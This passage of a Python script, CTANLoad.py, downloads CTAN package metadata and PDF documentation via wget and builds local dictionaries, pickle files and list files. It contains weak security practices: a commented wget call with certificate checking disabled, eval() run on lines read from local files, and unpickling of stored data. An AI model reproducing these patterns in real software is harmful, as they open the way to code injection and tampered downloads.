exclusion = ["authors.xml", "topics.xml", "packages.xml", "licenses.xml"]
random.seed(time.time()) # seed for random number generation
# ==================================================================
# argparse
# parses options and processes them
parser = argparse.ArgumentParser(description = program_text + " [" + prg_name + "; " +
"Version: " + prg_version + " (" + prg_date + ")]")
parser._positionals.title = 'Positional parameters'
parser._optionals.title = 'Optional parameters'
parser.add_argument("-a", "--author", # Parameter -a/--author
help = author_text,
action = 'version',
version = prg_author + " (" + prg_email + ", " + prg_inst + ")")
parser.add_argument("-A", "--author_template", # Parameter -A/--author_template
help = author_template_text + " - Default: " + "%(default)s",
dest = "author_template",
default = author_template_default)
parser.add_argument("-c", "--check_integrity", # Parameter -c/--check_integrity
help = integrity_text + " - Default: " + "%(default)s",
## help = argparse.SUPPRESS,
action = "store_true",
default = integrity_default)
parser.add_argument("-d", "--directory", # Parameter -d/--directory
help = direc_text + " - Default: " + "%(default)s",
dest = "direc",
default = direc_default)
parser.add_argument("-f", "--download_files", # Parameter -f/--download_files
help = download_text + " - Default: " + "%(default)s",
action = "store_true",
default = download_default)
parser.add_argument("-l", "--lists", # Parameter -l/--lists
help = lists_text + " - Default: " + "%(default)s",
action = "store_true",
default = lists_default)
parser.add_argument("-k", "--key_template", # Parameter -k/--key_template
help = key_template_text + " - Default: " + "%(default)s",
dest = "key_template",
default = key_template_default)
parser.add_argument("-n", "--number", # Parameter -n/--number
help = number_text + " - Default: " + "%(default)s",
dest = "number",
default = number_default)
parser.add_argument("-o", "--output", # Parameter -o/--output
help = output_text + " - Default: " + "%(default)s",
dest = "output_name",
default = output_name_default)
parser.add_argument("-r", "--regenerate_pickle_files", # Parameter -r/--regenerate_pickle_files
help = regenerate_text + " - Default: " + "%(default)s",
action = "store_true",
default = regenerate_default)
parser.add_argument("-t", "--template", # Parameter -t/--template
help = template_text + " - Default: " + "%(default)s",
dest = "template",
default = template_default)
parser.add_argument("-stat", "--statistics", # Parameter -stat/--statistics
help = statistics_text + " - Default: " + "%(default)s",
action = "store_true",
default = statistics_default)
parser.add_argument("-v", "--verbose", # Parameter -v/--verbose
help = verbose_text + " - Default: " + "%(default)s",
action = "store_true",
default = verbose_default)
parser.add_argument("-V", "--version", # Parameter -V/--version
help = version_text,
action = 'version',
version = '%(prog)s ' + prg_version + " (" + prg_date + ")")
# ------------------------------------------------------------------
# Getting parsed values
args = parser.parse_args() # all parameters of the program call
author_template = args.author_template # parameter -A
direc = args.direc # parameter -d
download = args.download_files # parameter -f
integrity = args.check_integrity # parameter -c
key_template = args.key_template # parameter -k
lists = args.lists # parameter -l
number = int(args.number) # parameter -n
regenerate = args.regenerate_pickle_files # parameter -r
statistics = args.statistics # Parameter -stat
template = args.template # parameter -t
verbose = args.verbose # parameter -v
# ------------------------------------------------------------------
# Correct OS directory name, test OS directory existence, and install OS directory
direc = direc.strip() # correct OS directory name (-d)
if direc[len(direc) - 1] != direc_sep:
direc += direc_sep
if not path.exists(direc):
try:
os.mkdir(direc)
except OSError:
print ("- Warning: Creation of the directory '{0}' failed".format(direc))
else:
print ("- Info: Successfully created the directory '{0}' ".format(direc))
output_name = direc + args.output_name # parameter -o (prefixed with the -d directory)
# ------------------------------------------------------------------
# additional files, if you want to search topics a/o authors and their corr. packages
topicpackage_file = direc + "CTAN.lpt" # name of an additional xyz.lpt file
authorpackage_file = direc + "CTAN.lap" # name of an additional xyz.lap file
# ------------------------------------------------------------------
# regular expressions
p2 = re.compile(template) # regular expression based on parameter -t
p3 = re.compile("^[0-9]{10}-.+[.]pdf$") # regular expression for local PDF file names
p4 = re.compile("^.+[.]xml$") # regular expression for local XML file names
p5 = re.compile(key_template) # regular expression for topics
p6 = re.compile(author_template) # regular expression for authors
#===================================================================
# Auxiliary function
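# Example (illustrative): fold("pkg-a|pkg-b|...|pkg-z") returns the same string
# with a line break and a 64-blank indent inserted whenever the accumulated
# chunk reaches about 70 characters, so long option values stay readable.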
def fold(s): # function fold: auxiliary function: shorten long option values for output
"""auxiliary function: shorten long option values for output"""
offset = 64 * " "
maxlen = 70
sep = "|" # separator for split
parts = s.split(sep) # split s on sep
line = ""
out = ""
for f in range(0, len(parts)):
if f != len(parts) - 1:
line = line + parts[f] + sep
else:
line = line + parts[f]
if len(line) >= maxlen:
out = out +line+ "\n" + offset
line = ""
out = out + line
return out
# ==================================================================
# Functions for main part
# ------------------------------------------------------------------
def analyze_XML_file(file): # Function analyze_XML_file(file): Analyze an XML package file for documentation (PDF) files.
"""Analyze an XML package file for documentation (PDF) files."""
# analyze_XML_file --> dload_document_file
global XML_toc # global Python dictionary
global PDF_toc # global Python dictionary for PDF files
error = False
try: # try to open and parse an XML file
f = open(file, encoding="utf-8", mode="r") # open the XML file
onePackage = ET.parse(f) # parse the XML file
onePackageRoot = onePackage.getroot() # get root
except: # parsing not successful
if verbose:
print("------- Warning: local XML file for package '{0}' empty or not well-formed".format(file))
error = True
if not error:
ll = list(onePackageRoot.iter("documentation")) # all documentation elements == all documentation children
for g in ll: # loop: all documentation children
href = g.get("href", "") # href attribute
if ".pdf" in href: # there is ".pdf" in the string
fnames = re.split("/", href) # split this string at "/"
href2 = href.replace("ctan:/", ctanUrl2) # construct the correct URL
if href in XML_toc: # href already used?
(tmp, fkey, onename) = XML_toc[href] # get the components
else: # href not already used?
onename = fnames[len(fnames) - 1] # get the file name
fkey = str(random.randint(1000000000, 9999999999)) # construct a random file name
XML_toc[href] = (file, fkey, onename) # store this new file name
if download:
if dload_document_file(href2, fkey, onename): # load the PDF document
PDF_toc[fkey + "-" + onename] = file
f.close() # close the analyzed XML file
# ------------------------------------------------------------------
def call_check(): # Function call_check: Process all necessary steps for an integrity check.
"""Process all necessary steps for an integrity check."""
# call_check --> get_PDF_files
# call_check --> dload_topics
# call_check --> dload_authors
# call_check --> dload_licenses
# call_check --> dload_packages
# call_check --> generate_topicspackage
# call_check --> generate_pickle1
# call_check --> generate_lists
# call_check --> check_integrity
global PDF_toc
global XML_toc
global authors
global licenses
global packages
global topics
global topicspackage, packagetopics, number, counter, pdfcounter
get_PDF_files(direc)
dload_topics() # load the file topics.xml
dload_authors() # load the file authors.xml
dload_licenses() # load the file licenses.xml
dload_packages() # load the file packages.xml
generate_topicspackage() # generates topicspackage, ...
thr3 = Thread(target=generate_pickle1) # dumps authors, packages, topics, licenses, topicspackage, packagetopics
thr3.start()
thr3.join()
if lists: # if lists are to be generated
generate_lists() # generate x.loa, x.lop, x.lok, x.lol, x.lpt, x.lap
if integrity: # if the integrity is to be checked
check_integrity() # when indicated: remove files or entries
# ------------------------------------------------------------------
def call_load(): # Function call_load: Process all steps for a complete ctanout call (without integrity check).
"""Process all steps for a complete ctanout call (withoutb integrity check)."""
# call_load --> get_PDF_files
# call_load --> dload_topics
# call_load --> dload_authors
# call_load --> dload_licenses
# call_load --> dload_packages
# call_load --> load_XML_toc
# call_load --> set_PDF_toc
# call_load --> dload_XML_files
# call_load --> generate_pickle2
global PDF_toc
global XML_toc
global authors
global licenses
global packages
global topics
global topicspackage, number, counter, pdfcounter
get_PDF_files(direc)
load_XML_toc()
set_PDF_toc()
dload_topics() # load the file topics.xml
dload_authors() # load the file authors.xml
dload_licenses() # load the file licenses.xml
dload_packages() # load the file packages.xml
all_packages = set() # initialize set
for f in packages:
all_packages.add(f) # construct a set object (packages is a dictionary, not a set)
tmp_tp = all_packages.copy() # initialize tmp_tp
tmp_ap = all_packages.copy() # initialize tmp_ap
tmp_np = all_packages.copy() # initialize tmp_np
if (template != template_default):
tmp_np = get_package_set() # analyze 'packages' for name templates
if (key_template != key_template_default):
tmp_tp = get_CTAN_lpt() # load CTAN.lpt and analyze it for key templates
if (author_template != author_template_default):
tmp_ap = get_CTAN_lap() # load CTAN.lap and analyze it for author templates
tmp_pp = tmp_tp & tmp_ap & tmp_np
if len(tmp_pp) == 0:
if verbose:
print("--- Warning: no correct XML file for any specified package found")
tmp_p = sorted(tmp_pp) # build a sorted list from the intersection
dload_XML_files(tmp_p) # load and process all required XML files in series
thr1 = Thread(target=generate_pickle2) # dump XML_toc via pickle file via thread
thr1.start()
thr1.join()
generate_topicspackage() # generates topicspackage, ...
thr2 = Thread(target=generate_pickle1) # dump some lists to pickle file
thr2.start()
thr2.join()
# ------------------------------------------------------------------
def call_plain(): # Function call_plain: Process all steps for a plain call.
"""Process all steps for a plain call."""
# call_plain --> get_PDF_files
# call_plain --> dload_topics
# call_plain --> dload_authors
# call_plain --> dload_licenses
# call_plain --> dload_packages
# call_plain --> generate_topicspackage
# call_plain --> generate_pickle1
global PDF_toc
global authors
global licenses
global packages
global topics
global topicspackage, packagetopics, authorpackages
get_PDF_files(direc)
dload_topics() # load the file topics.xml
dload_authors() # load the file authors.xml
dload_licenses() # load the file licenses.xml
dload_packages() # load the file packages.xml
generate_topicspackage() # generate topicspackage, ...
thr3 = Thread(target=generate_pickle1) # dump authors, packages, topics, licenses, topicspackage, packagetopics (via thread)
thr3.start()
thr3.join()
# ------------------------------------------------------------------
def check_integrity(always=False): # Function check_integrity(): Check integrity.
"""Check integrity."""
# check_integrity --> generate_pickle2
# check_integrity --> verify_PDF_files
global corrected # number of corrections
global PDF_toc # PDF_toc, structure: PDF_toc[file] = fkey + "-" + onename
global noerror
global ok
if verbose:
print("--- Info: integrity check")
load_XML_toc() # load the 2nd pickle file (XML_toc)
# XML_toc, structure: XML_toc[href] = (file, fkey, onename)
noerror = True
tmpdict = {} # for a copy of XML_toc
for f in XML_toc: # make a copy of XML_toc
tmpdict[f] = XML_toc[f]
# ..................................................................
for f in tmpdict: # loop: all entries in a copy of XML_toc
tmp = tmpdict[f]
xlfn = direc + tmp[0] # local file name for current XML file
plfn = direc + tmp[1] + "-" + tmp[2] # local file name for current PDF file
xex = os.path.isfile(xlfn) # test: XML file exists
pex = os.path.isfile(plfn) # test: PDF file exists
if xex: # XML file exists
if os.path.getsize(xlfn) == 0: # but file is empty
if verbose:
print("----- Warning: entry '{0}' in dictionary, but OS file is empty".format(xlfn))
os.remove(xlfn) # OS file removed
if verbose:
print("----- Warning: XML file '{0}' in OS deleted".format(xlfn))
del XML_toc[f] # entry deleted
if verbose:
print("----- Warning: entry '{0}' in dictionary deleted".format(xlfn))
noerror = False # flag set
corrected += 1 # number of corrections increased
else: # XML file not empty
if os.path.isfile(plfn): # test: PDF file exists
if os.path.getsize(plfn) != 0:
PDF_toc[tmp[1] + "-" + tmp[2]] = tmp[0] # generate entry in PDF_toc
else:
if verbose:
print("----- Warning: entry '{0}' ({1}) in dictionary, but OS file is empty".format(plfn, tmp[0]))
os.remove(plfn) # OS file removed
if verbose:
print("----- Warning: PDF file '{0}' in OS deleted".format(plfn))
del XML_toc[f] # entry deleted
if verbose:
print("----- Warning: entry '{0}' in dictionary deleted".format(plfn))
noerror = False # flag set
corrected += 1 # number of corrections increased
else:
if verbose:
print("----- Warning: entry '{0}' ({1}) in dictionary, but PDF file not found".format(plfn, tmp[0]))
del XML_toc[f] # entry deleted
if verbose:
print("----- Warning: entry '{0}' in dictionary deleted".format(plfn))
noerror = False # flag set
corrected += 1 # number of corrections increased
else: # XML file does not exist
print("----- Warning: entry '{0}' in dictionary, but OS file not found".format(xlfn))
del XML_toc[f] # entry deleted
print("----- Warning: entry '{0}' in dictionary deleted".format(xlfn))
noerror = False # flag set
corrected += 1 # number of corrections increased
thr5 = Thread(target=verify_PDF_files) # check actualized PDF_toc; delete a PDF file if necessary
thr5.start()
thr5.join()
# ..................................................................
if noerror and ok and (not always): # there is no error
if verbose:
print("----- Info: no error with integrity check")
else:
thr2 = Thread(target=generate_pickle2) # generate a new version of the 2nd pickle file (via thread)
thr2.start()
thr2.join()
# ------------------------------------------------------------------
def dload_authors(): # Function dload_authors(): Download XML file 'authors' from CTAN and generate dictionary 'authors'.
"""Download XML file 'authors'zztex.xml from CTAN and generate dictionary 'authors'."""
global authors # global Python dictionary with authors
file = "authors" # file name
file2 = file + ext # file name (with extension)
callx = call1 + file + parameter + direc + file2 # command for Popen
try: # load file 'authors'
# wget https://ctan.org/xml/2.0/authors?no-dtd=true --no-check-certificate -O ./authors.xml
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait?
if verbose:
print("--- Info: XML file '{0}' downloaded ('{1}.xml' on PC)".format(file, direc + file))
try:
authorsTree = ET.parse(file2) # parse the XML file 'authors.xml'
authorsRoot = authorsTree.getroot() # get the root
for child in authorsRoot: # all children
key = "" # defaults
id = ""
fname = ""
gname = ""
for attr in child.attrib: # three attributes: id, givenname, familyname
if str(attr) == "id":
key = child.attrib['id'] # attribute id
if str(attr) == "givenname":
gname = child.attrib['givenname'] # attribute givenname
if str(attr) == "familyname":
fname = child.attrib['familyname'] # attribute familyname
authors[key] = (gname, fname)
if verbose:
print("----- Info: authors collected")
except: # parsing was not successful
if verbose:
print("--- Error: standard XML file '{0}' empty or not well-formed".format(file2))
sys.exit("- Error: program terminated")
except FileNotFoundError: # file not downloaded
if verbose:
print("--- Error: XML file '{0}' not downloaded".format(file))
sys.exit("- Error: program terminated") # program terminated
# ------------------------------------------------------------------
def dload_document_file(href, key, name): # Function dload_document_file(href, key, name): Download one information file (PDF) from CTAN.
"""Download one information file (PDF) from CTAN."""
# to be improved
global pdfcounter
global pdfctrerr
call = "wget " + href + parameter + direc + key + "-" + name
noterror = False
# @wait: 17.5.3 in library
try: # download the PDF file and store
process = subprocess.Popen(call, universal_newlines=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
outs, errs = process.communicate(timeout=50) # wait?
if "ERROR" in errs: # "ERROR" found in errs
if verbose:
print("------- Warning: PDF documentation file '{0}' not downloaded".format(name))
pdfctrerr = pdfctrerr + 1
else:
if verbose:
print("------- Info: PDF documentation file '{0}' downloaded".format(name))
print("------- Info: unique local file name: '{0}'".format(direc + key + "-" + name))
pdfcounter = pdfcounter + 1 # number of downloaded PDF files incremented
noterror = True
except: # download was not successful
process.kill() # kill the process
outs, errs = process.communicate() # output and error messages
if verbose:
print("------- Warning: PDF documentation file '{0}' not downloaded".format(name))
return noterror
# ------------------------------------------------------------------
def dload_licenses(): # Function dload_licenses: Download XML file 'licenses' from CTAN and generate dictionary 'licenses'.
"""Download XML file 'licenses' from CTAN and generate dictionary 'licenses'."""
global licenses # global Python dictionary with licenses
file = "licenses" # file name
file2 = file + ext # file name (with extension)
callx = call1 + file + parameter + direc + file2 # command for Popen
try: # loads file .../licenses
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait?
if verbose:
print("--- Info: XML file '{0}' downloaded ('{1}.xml' on PC)".format(file, direc + file))
try:
licensesTree = ET.parse(file2) # parse the XML file 'licenses.xml'
licensesRoot = licensesTree.getroot() # get the root
for child in licensesRoot: # all children in 'licenses'
key = "" # defaults
name = ""
free = ""
for attr in child.attrib: # three attributes: key, name, free
if str(attr) == "key":
key = child.attrib['key'] # attribute key
if str(attr) == "name":
name = child.attrib['name'] # attribute name
if str(attr) == "free":
free = child.attrib['free'] # attribute free
licenses[key] = name
licenses["noinfo"] = "No Information" # correction; not in lincenses.xml
licenses["collection"] = "Collection" # correction; not in lincenses.xml
licenses["digest"] = "Digest" # correction; not in lincenses.xml
if verbose:
print("----- Info: licenses collected")
except: # parsing was not successfull
if verbose:
print("--- Error: standard XML file '{0}' empty or not well-formed".format(file))
sys.exit("--- Error: programm terminated")
except FileNotFoundError: # file not downloaded
if verbose:
print("--- Error: XML file '{0}' not downloaded".format(file))
sys.exit("- Error: programm terminated") # program terminated
# ------------------------------------------------------------------
def dload_packages(): # Function dload_packages: Download XML file 'packages' from CTAN and generate dictionary 'packages'.
"""Download XML file 'packages' from CTAN and generate dictionary 'packages'."""
global packages # global Python dictionary with packages
file = "packages" # file name
file2 = file + ext # file name (with extension)
callx = call1 + file + parameter + direc + file2 # command for Popen
try: # loads file .../packages
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait?
if verbose:
print("--- Info: XML file '{0}' downloaded ('{1}.xml' on PC)".format(file, direc + file))
try: # parses 'packages' tree
packagesTree = ET.parse(file2) # parse the XML file 'packages.xml'
packagesRoot = packagesTree.getroot() # get the root
for child in packagesRoot: # all children in 'packages'
key = "" # defaults
name = ""
caption = ""
for attr in child.attrib: # three attributes: key, name, caption
if str(attr) == "key":
key = child.attrib['key'] # attribute key
if str(attr) == "name":
name = child.attrib['name'] # attribute name
if str(attr) == "caption":
caption = child.attrib['caption'] # attribute caption
packages[key] = (name, caption)
if verbose:
print("----- Info: packages collected")
except: # parsing was not successful
if verbose:
print("--- Error: standard XML file '{0}' empty or not well-formed".format(file2))
sys.exit("--- Error: program terminated")
except FileNotFoundError: # file not downloaded
if verbose:
print("--- Error: XML file '{0}' not downloaded".format(file))
sys.exit("- Error: program terminated") # program terminated
# ------------------------------------------------------------------
def dload_topics(): # Function dload_topics(): Download XML file 'topics' from CTAN and generate dictionary 'topics'.
"""Download XML file 'topics' from CTAN and generate dictionary 'topics'."""
global topics # global Python dictionary with topics
file = "topics" # file name
file2 = file + ext # file name (with extension)
callx = call1 + file + parameter + direc + file2 # command for Popen
try: # loads file .../topics
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait?
if verbose:
print("--- Info: XML file '{0}' downloaded ('{1}.xml' on PC)".format(file, direc + file))
try:
topicsTree = ET.parse(file2) # parse the XML file 'topics.xml'
topicsRoot = topicsTree.getroot() # get the root
for child in topicsRoot: # all children in 'topics'
key = "" # defaults
name = ""
details = ""
for attr in child.attrib: # two attributes: name, details
if str(attr) == "name":
key = child.attrib['name'] # attribute name
if str(attr) == "details":
details = child.attrib['details'] # attribute details
topics[key] = details
if verbose:
print("----- Info: topics collected")
except: # parsing was not successful
if verbose:
print("--- Error: standard XML file '{0}' empty or not well-formed".format(file))
sys.exit("--- Error: program terminated")
except FileNotFoundError: # file not downloaded
if verbose:
print("--- Error: XML file '{0}' not downloaded".format(file))
sys.exit("- Error: program terminated") # program terminated
# ------------------------------------------------------------------
def dload_XML_files(p): # Function dload_XML_files: Download XML package files.
"""Download XML package files.
p: packages/selected_packages"""
# dload_XML_file --> analyze_XML_file
global topicspackage, number, counter, pdfcounter
for f in p: # all packages found in 'packages'
if p2.match(f) and (counter + pdfcounter < number): # file name matches template
counter = counter + 1
callx = call2 + f + parameter + direc + f + ext # wget https://ctan.org/xml/2.0/pkg/xyz --no-check-certificate -O xyz.xml
try: # try to download the XML file (packages)
process = subprocess.Popen(callx, stderr=subprocess.PIPE, universal_newlines=True)
process.wait() # wait ?
if verbose:
print("----- Info: XML file for package '{0}' downloaded ('{1}.xml' on PC)".format(f, direc + f))
analyze_XML_file(f + ext) # if download is set: analyze the associated XML file
except FileNotFoundError: # download was not successful
if verbose:
print("----- Warning: XML file for package '{0}' not downloaded".format(f))
if counter + pdfcounter >= number: # limit for downloaded files
if verbose:
print("--- Warning: maximum number ({0}) of downloaded XML+PDF files exceeded".format(number))
# ------------------------------------------------------------------
def generate_lists(): # Function generate_lists: Generate some special files (with lists):
# xyz.loa (list of authors), xyz.lop (list of packages), xyz.lok (list of topics), xyz.lol (list of licenses),
# xyz.lpt (list of topics and associated packages), xyz.lap (list of authors and associated packages)
"""Generate some special files (with lists):
xyz.loa (list of authors)
xyz.lop (list of packages)
xyz.lok (list of topics)
xyz.lol (list of licenses)
xyz.lpt (list of topics and associated packages)
xyz.lap (list of authors and associated packages)
xyz is the specified generic output file name."""
# .................................................
# generate xyz.loa file (list of authors)
loa_file = output_name + ".loa"
loa = open(loa_file, encoding="utf-8", mode="w") # open xyz.loa file
for f in authors: # loop
loa.write(str(authors[f]) + "\n")
if verbose:
print("--- Info: file '" + loa_file + "' (list of authors) generated")
loa.close() # close xyz.loa file
# .................................................
# generate xyz.lop file (list of packages)
lop_file = output_name + ".lop"
lop = open(lop_file, encoding="utf-8", mode="w") # open xyz.lop file
for f in packages: # loop
lop.write(str(packages[f]) + "\n")
if verbose:
print("--- Info: file '" + lop_file + "' (list of packages) generated")
lop.close() # close xyz.lop file
# .................................................
# generate xyz.lok file (list of topics)
lok_file = output_name + ".lok"
lok = open(lok_file, encoding="utf-8", mode="w") # open xyz.lok file
for f in topics: # loop
lok.write("('" + f + "', '" + str(topics[f]) + "')\n")
if verbose:
print("--- Info: file '" + lok_file + "' (list of topics) generated")
lok.close() # close xyz.lok file
# .................................................
# generate xyz.lol file (list of licenses)
lol_file = output_name + ".lol"
lol = open(lol_file, encoding="utf-8", mode="w") # open xyz.lol file
for f in licenses: # loop
lol.write("('" + f + "', '" + str(licenses[f]) + "')\n")
if verbose:
print("--- Info: file '" + lol_file + "' (list of licenses) generated")
lol.close() # close xyz.lol file
# .................................................
# generate xyz.lpt file (list of topics and associated packages)
lpt_file = output_name + ".lpt"
lpt = open(lpt_file, encoding="utf-8", mode="w") # open xyz.lpt file
for f in topicspackage: # loop
lpt.write("('" + f + "', " + str(topicspackage[f]) + ")\n")
if verbose:
print("--- Info: file '" + lpt_file + "' (list of topics and associated packages) generated")
lpt.close() # close xyz.lpt file
# .................................................
# generate xyz.lap file (list of authors and associated packages)
lap_file = output_name + ".lap"
lap = open(lap_file, encoding="utf-8", mode="w") # open xyz.lap file
for f in authorpackages: # loop
lap.write("('" + str(f) + "', " + str(authorpackages[f]) + ")\n")
if verbose:
print("--- Info: file '" + lap_file + "' (list of authors and associated packages) generated")
lap.close() # close xyz.lap file
# ------------------------------------------------------------------
def generate_pickle1(): # Function generate_pickle1: pickle dump: actual authors, packages, licenses, topics, topicspackage, packagetopics, authorpackages
"""pickle dump:
actual authors, packages, licenses, topics, topicspackage, packagetopics, authorpackages"""
# authors: Python dictionary (sorted)
# each element: [author key] <tuple with givenname and familyname>
#
# packages: Python dictionary (sorted)
# each element: [package key] <tuple with package name and package title>
#
# licenses: Python dictionary (sorted)
# each element: [license key] <license title>
#
# topics: Python dictionary (sorted)
# each element: [topics name] <topics title>
#
# topicspackage: Python dictionary (unsorted)
# each element: [topic key] <list with package names>
#
# packagetopics: Python dictionary (sorted)
# each element: [topic key] <list with package names>
#
# authorpackages: Python dictionary (unsorted)
# each element: [author key] <list with package names>
pickle_name1 = direc + pkl_file # path of the pickle file
pickle_file1 = open(pickle_name1, "bw") # open the pickle file
pickle_data1 = (authors, packages, topics, licenses, topicspackage, packagetopics, authorpackages)
pickle.dump(pickle_data1, pickle_file1) # dump the data
pickle_file1.close() # close the file
if verbose:
print("--- Info: pickle file '{0}' written".format(pickle_name1))
# ------------------------------------------------------------------
def generate_pickle2(): # Function generate_pickle2: pickle dump: actual XML_toc (list with download information files).
"""pickle dump:
needs actual XML_toc
XML_toc : list with download information files"""
pickle_name2 = direc + pkl_file2
try:
pickle_file2 = open(pickle_name2, "bw") # open the 2nd .pkl file
pickle_data2 = XML_toc # prepare the data
pickle.dump(pickle_data2, pickle_file2) # dump the data
pickle_file2.close() # close the file
if verbose:
print("--- Info: pickle file '{0}' written".format(pickle_name2))
except: # not successful
if verbose:
print("--- Warning: pickle file '{0}' cannot be loaded a/o written".format(pickle_name2))
# ------------------------------------------------------------------
def generate_topicspackage(): # Function generate_topicspackage(): Generate topicspackage, packagetopics, and authorpackages.
"""Generate topicspackage, packagetopics, and authorpackages."""
global topicspackage, packagetopics, authorpackages
for f in packages: # all package XML files are loaded in series
try: # try to open and parse file
fext = f + ext # file name (with extension)
ff = open(fext, encoding="utf-8", mode="r")
try:
onePackage = ET.parse(fext) # parse the XML file
onePackageRoot = onePackage.getroot() # get root
ll = list(onePackageRoot.iter("keyval")) # all keyval elements
aa = list(onePackageRoot.iter("authorref")) # all authorref elements
for i in ll: # in keyval: 1 attribute: value
key = i.get("value", "") # attribute value
if key in topicspackage:
topicspackage[key].append(f)
else:
topicspackage[key] = [f]
if f in packagetopics:
packagetopics[f].append(key)
else:
packagetopics[f] = [key]
for j in aa: # in authorref: 4 attributes: givenname, familyname, key, id
key1 = j.get("givenname", "") # attribute givenname
key2 = j.get("familyname", "") # attribute familyname
key3 = j.get("key", "") # attribute key
key4 = j.get("id", "") # attribute id
if key4 != "":
key3 = key4
if key3 in authorpackages:
authorpackages[key3].append(f)
else:
authorpackages[key3] = [f]
except: # parsing was not successful
if verbose:
print("----- Warning: local XML file for package '{0}' empty or not well-formed".format(f))
ff.close()
except FileNotFoundError: # file not downloaded
if verbose and integrity:
print("----- Warning: local XML file for package '{0}' not found".format(f))
if verbose:
print("--- Info: packagetopics, topicspackage, authorpackage collected")
# ------------------------------------------------------------------
def get_CTAN_lpt(): # function get_CTAN_lpt: Load and analyze the local CTAN.lpt file for topic templates
"""Load and analyze the local CTAN.lpt file for topic templates."""
global number, counter, pdfcounter
try:
f = open(topicpackage_file, encoding="utf-8", mode="r") # open file
for line in f:
top, pack=eval(line.strip())
if p5.match(top): # collect packages with specified topics
for g in pack:
selected_packages_lpt.add(g)
f.close() # close file
except IOError:
if verbose: # there is an error
print("- Error: local file '{0}' not loaded".format(topicpackage_file))
sys.exit() # program terminates
if len(selected_packages_lpt) == 0:
if verbose:
print("--- Warning: no package found which matched the specified {0} template '{1}'".format("topic", key_template))
return selected_packages_lpt
# ------------------------------------------------------------------
def get_CTAN_lap(): # function get_CTAN_lap: Load and analyze the local CTAN.lap file for author templates
"""Load and analyze the local CTAN.lap file for author templates."""
global number, counter, pdfcounter
try:
f = open(authorpackage_file, encoding="utf-8", mode="r") # open file
for line in f:
auth, pack=eval(line.strip()) # get the items author and package
if authors[auth][1] != "": # extract author's familyname
auth2 = authors[auth][1]
else:
auth2 = authors[auth][0]
if p6.match(auth2): # collect packages with specified authors
for g in pack:
selected_packages_lap.add(g)
f.close() # close file
except IOError:
if verbose: # there is an error
print("- Error: local file '{0}' not loaded".format(authorpackage_file))
sys.exit() # program terminates
if len(selected_packages_lap) == 0:
if verbose:
print("--- Warning: no package found which matched the specified {0} template '{1}'".format("author", author_template))
return selected_packages_lap
# ------------------------------------------------------------------
def get_package_set(): # Function get_package_set: Analyze dictionary 'packages' for name templates.
"""Analyze dictionary 'packages' for name templates."""
tmp = set()
for f in packages:
if p2.match(f):
tmp.add(f)
if len(tmp) == 0:
if verbose:
print("--- Warning: no package found which matched the specified {0} template '{1}'".format("name", template))
return tmp
# ------------------------------------------------------------------
def get_PDF_files(d): # Function get_PDF_files(d): List all PDF files in a specified OS directory.
"""List all PDF files in the specified OS directory d.
d: directory"""
global PDF_toc
tmp = os.listdir(d) # get OS directory list
tmp2 = {}
for f in tmp: # all PDF files in current OS directory
if p3.match(f): # check: file name matches p3
tmp2[f] = "" # presets with empty string
PDF_toc = tmp2
# ------------------------------------------------------------------
def get_XML_files(d): # Function get_XML_files(d)
"""List all XML files in the OS directory d"""
tmp = os.listdir(d) # get OS directory list
tmp2 = []
for f in tmp:
if p4.match(f) and not f in exclusion:
tmp2.append(f)
return tmp2
# ------------------------------------------------------------------
def load_XML_toc(): # Function load_XML_toc(): Load pickle file 2 (which contains XML_toc).
"""Load pickle file 2 (which contains XML_toc)."""
global XML_toc # global Python dictionary
try:
pickleFile2 = open(direc + pkl_file2, "br") # open the pickle file
XML_toc = pickle.load(pickleFile2) # unpickle the data
pickleFile2.close()
except IOError: # not successfull
pass # do nothing
# ------------------------------------------------------------------
def main(): # Function main(): Main Function
"""Main Function"""
# main --> call_plain
# main --> call_check
# main --> call_load
# main --> make_statistics
global PDF_toc
global download
global lists
global integrity
global number
global template
global author_template
global regenerate
starttotal = time.time() # begin of time measure
startprocess= time.process_time()
reset_text = "- Warning: '{0}' reset to {1} (due to {2})"
load = (template != template_default) or (key_template != key_template_default) or (author_template != author_template_default) # load
check = (not load) and ((lists != lists_default) or (integrity != integrity_default)) # check
newpickle = (not load) and (not check) and (regenerate != regenerate_default) # newpickle
plain = (not load) and (not check) and (not newpickle) # plain
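    # Mode precedence: a name (-t), topic (-k) or author (-A) template selects
    # 'load'; otherwise -l or -c selects 'check'; otherwise -r selects
    # 'newpickle'; a call without any of these options runs 'plain'.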
if verbose:
print("- Info: program call:", call)
if load: # load mode
if (lists != lists_default): # -l reset
lists = False
if verbose:
print(reset_text.format("-l",False,"'-n' or '-t' or '-f'"))
if (integrity != integrity_default): # -c reset
integrity = False
if verbose:
print(reset_text.format("-c",False,"'-n' or '-t' or '-f'"))
if (regenerate != regenerate_default): # -r reset
regenerate = False
if verbose:
print(reset_text.format("-r", False, "'-n' or '-t' or '-f'"))
if check: # check mode
if (regenerate != regenerate_default): # -r reset
regenerate = False
if verbose:
print(reset_text.format("-r", False, "'-l' or '-c'"))
if newpickle: # newpickle mode
if number == number_default:
number = 3000 # -n reset
if verbose:
print(reset_text.format("-n", 3000, "'-r'"))
if download == download_default:
download = True # -f reset
if verbose:
print(reset_text.format("-f", True, "'-r'"))
if verbose: # output on terminal (options in call)
print("\n- Info: program call (with more details): CTANLoad.py")
if (download != download_default): print(" {0:5} {1:55}".format("-f", "(" + download_text + ")"))
if (lists != lists_default): print(" {0:5} {1:55}".format("-l", "(" + (lists_text + ")")[0:50] + ellipse))
if (regenerate != regenerate_default): print(" {0:5} {1:55}".format("-r", "(" + regenerate_text + ")"))
if (statistics != statistics_default): print(" {0:5} {1:55}".format("-stat", "(" + statistics_text + ")"))
if (integrity != integrity_default): print(" {0:5} {1:55}".format("-c", "(" + integrity_text + ")"))
if (verbose != verbose_default): print(" {0:5} {1:55}".format("-v", "(" + verbose_text + ")"))
if (direc != direc_default): print(" {0:5} {2:55} {1}".format("-d", direc, "(" + direc_text + ")"))
if (number != number_default): print(" {0:5} {2:55} {1}".format("-n", number, "(" + number_text + ")"))
if (output_name != direc + output_name_default): print(" {0:5} {2:55} {1}".format("-o", args.output_name, "(" + output_text + ")"))
